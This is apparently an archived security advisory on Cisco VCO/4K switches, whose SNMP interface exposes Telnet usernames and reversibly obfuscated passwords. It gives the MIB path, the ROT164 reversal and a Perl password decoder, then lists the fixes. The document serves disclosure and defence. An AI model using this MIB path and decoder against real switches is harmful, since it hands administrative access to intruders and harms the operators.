COMMAND

    Cisco

SYSTEMS AFFECTED

    Cisco (Formerly Summa Four) VCO/4K software version 5.1.3 and below

PROBLEM

    Following  is  based  on  a  @stake  Security  Advisory  by  David
    Goldsmith, Brian Carrier and Rex Warren.  This advisory  describes
    a  vulnerability  that  exists  in  Cisco Systems' Virtual Central
    Office 4000 (VCO/4K).   The VCO/4K is  a programmable switch  that
    provides   numerous   telephony   capabilities   including   voice
    services,  switching  for  wireless  and  wireline  networks,  and
    circuit/packet-switched network gateway services.  The VCO/4K  can
    be administered  via several  TCP/IP interfaces,  including Telnet
    and SNMP.   There is  a vulnerability  in the  SNMP interface that
    allows an attacker to  enumerate username and obfuscated  password
    pairs  for  the  Telnet  interface.   Since the obfuscation method
    used on the passwords is reversible, administrative access to  the
    VCO/4K can be obtained.

    If an attacker knows the  read-only community string of a  VCO/4K,
    then  they  can  obtain  a  list  of  users  and  their obfuscated
    passwords.  The  obfuscation can be  easily reversed, allowing  an
    attacker to obtain additional privileges on the VCO/4K.

    The SNMP MIB of the VCO/4K  contains, among other data, a list  of
    usernames and passwords.  These entries start at:

        [ ... ]
        enterprises.886.1.1.1.1.2.1 = "someuser"
        enterprises.886.1.1.1.1.3.1 = 0
        enterprises.886.1.1.1.1.4.1 = ".At4Cqq"
        enterprises.886.1.1.1.1.5.1 = 0
        [ ... ]

    The enterprises.886.1.1.1.1.2.1 entry is the first username,  with
    enterprises.886.1.1.1.1.4.1   being   the   corresponding  (albeit
    obfuscated) password.

    The password obfuscation algorithm  is a substitution cipher  that
    replaces each ASCII character by one that is 164 places away.  For
    historical reasons, we will call this ROT164():

        ROT164(X) = 164 - X

    Using the example above:

        ROT164(".") = 164 - 046 = 118 => "v"
        ROT164("A") = 164 - 065 = 099 => "c"
        ROT164("t") = 164 - 116 = 048 => "0"
        ROT164("4") = 164 - 052 = 112 => "p"
        ROT164("C") = 164 - 067 = 097 => "a"
        ROT164("q") = 164 - 113 = 051 => "3"
        ROT164("q") = 164 - 113 = 051 => "3"

    The decryption code was written in PERL by Rex Warren.  Due to the
    cyclic  properties  of  ROT164,  the  program  accepts  both   the
    plaintext  and  the  obfuscated  password  as  standard  input and
    returns the opposite version.

    #!/usr/bin/perl
    
    printf ("Cisco VCO/4K Password [De]Obfuscator\n");
    printf ("\t\@stake, Inc.\n");
    printf ("\tRex Warren, Brian Carrier, David Goldsmith\n");
    
    printf ("Enter Password: ");
    $pw = <STDIN>;
    chop $pw;
    
    printf("Result: ");
    for ($pos = 0; $pos < length($pw); $pos++){
        printf("%s", chr(164 - ord(substr($pw, $pos, 1))));
    }
    printf("\n");

SOLUTION

    If SNMP is not required  on the VCO/4K, then disable  the service.
    If  it  is  required,  then  verify  that  the community string is
    difficult to guess and that access to it is restricted.

    Cisco Systems is aware of the vulnerability reported by @stake and
    has prepared  two software  releases to  address the  problem.  In
    Cisco VCO/4K software version 5.1.4, the display of the  usernames
    and  encrypted  passwords  has  been  removed from SNMP responses.
    Version  5.2,  to  be  released  in  early December, also includes
    enhancements replacing  the weak  password encryption  with MD5 --
    similar to Type  5 passwords in  Cisco IOS --  as well as  general
    improvements to access control.